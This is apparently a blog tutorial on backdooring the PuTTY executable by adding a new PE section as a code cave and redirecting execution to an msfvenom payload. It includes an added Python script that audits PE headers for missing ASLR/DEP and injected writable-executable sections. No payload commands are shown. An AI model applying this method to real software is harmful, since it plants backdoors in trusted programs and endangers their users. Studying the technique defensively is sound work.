Backdooring PE Files
This is a complete beginner's guide to backdooring PE files.
TL;DR
In this blog, we will discuss the Portable Executable (PE) backdooring technique: injecting a new section header into PuTTY v0.66, using the added section as a code cave, and popping a calculator from the injected code cave.
Table of Contents:
Introduction
Identifying the vulnerable PE file
Generating Payload
Adding new PE Section Header
Adding Payload to new PE Section Header
Redirecting execution flow to attacker's payload
Redirecting execution flow back to the program's instructions
Let's dive in.
Introduction
I will try to explain some important topics in the simplest manner, as below:
PE File
According to Wikipedia, Portable Executable (PE) format is a file format for executables, object code, DLLs and others used in 32-bit and 64-bit versions of Windows operating systems.
Section Header
It is also known as the section table. Each row of the section table is, in effect, a section header. This table immediately follows the optional header, if any. This positioning is required because the file header does not contain a direct pointer to the section table. Instead, the location of the section table is determined by calculating the location of the first byte after the headers. Make sure to use the size of the optional header as specified in the file header.
Code Cave
A code cave is a series of null bytes in a process's memory. In practice, the term refers to a region of a program's code that has spare room for the injection of custom instructions. For example, if a region of memory has room for five bytes and only three bytes are used, then the remaining two bytes can be used to add code without making significant changes to the program.
Identifying the vulnerable PE file
First we will check whether our application is vulnerable to PE injection and whether any type of protection is in use. We can automate this check with the following PowerShell script: PESecurity
Note: For this write-up, I am going to use PuTTY. (Download Link: PuTTY 0.66)
So, let's verify whether PuTTY is using any type of protection that would prevent PE injection:
As we can see, no security protection is in use that would prevent the injection. So let's move on to the next step.
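The section-table walk from the Section Header paragraph and the protection check from this step, as an added Python example (not part of the original post, and not the PESecurity script): it locates the section table from SizeOfOptionalHeader as described, reads the ASLR and DEP bits from DllCharacteristics, and flags any section marked both writable and executable, which is how an injected section usually stands out to a defender. The sample PE header is constructed in code; `build_sample_pe` and the dictionary field names are this example's own.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
WX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # ASLR
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # DEP

def parse_pe(data: bytes) -> dict:
    """Read DllCharacteristics and the section table from a PE image."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]  # e_lfanew in the DOS header
    if data[:2] != b"MZ" or data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    # 20-byte COFF file header follows the PE signature
    _, num_sections, _, _, _, size_of_optional, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt = pe_off + 24
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in PE32 and PE32+
    # No header field points at the section table: it starts at the first byte after
    # the optional header, so SizeOfOptionalHeader from the file header must be used.
    table = opt + size_of_optional
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        chars = struct.unpack_from("<I", data, table + 40 * i + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode(), "virtual_size": vsize, "virtual_address": vaddr,
                         "raw_size": raw_size, "raw_ptr": raw_ptr, "characteristics": chars})
    return {"dll_characteristics": dll_chars, "sections": sections}

def audit(data: bytes) -> list:
    """Report missing mitigations and writable+executable sections, as a PESecurity-style check does."""
    info = parse_pe(data)
    findings = []
    if not info["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE:
        findings.append("ASLR disabled")
    if not info["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_NX_COMPAT:
        findings.append("DEP disabled")
    for s in info["sections"]:
        if (s["characteristics"] & WX) == WX:  # an injected section is typically marked RWX
            findings.append(f"section {s['name']} is writable and executable")
    return findings

def build_sample_pe(dll_chars: int, sections: list) -> bytes:
    """Constructed minimal PE32 header (not a real program) so the checks run offline."""
    pe_off = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", pe_off)).ljust(pe_off, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)  # i386, 0xE0-byte optional header
    opt = (struct.pack("<H", 0x10B).ljust(70, b"\0") + struct.pack("<H", dll_chars)).ljust(0xE0, b"\0")
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, vs, va, rs, rp, ch in sections)
    return dos + b"PE\0\0" + coff + opt + table
```

On a real binary, `audit(open(path, "rb").read())` reports the same ASLR and DEP state that PESecurity shows, plus any section whose flags make it both writable and executable.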
Generating Payload
First, we will generate a suitable payload using msfvenom. We will use the EXITFUNC=none option so that execution can continue after the payload runs, without invoking ExitThread.
Here are the msfvenom commands:
Payload #1: Pop-up Calculator
Payload #2: Gain a reverse shell
Note: I will pop up the calculator, as it makes the tutorial a little easier to follow.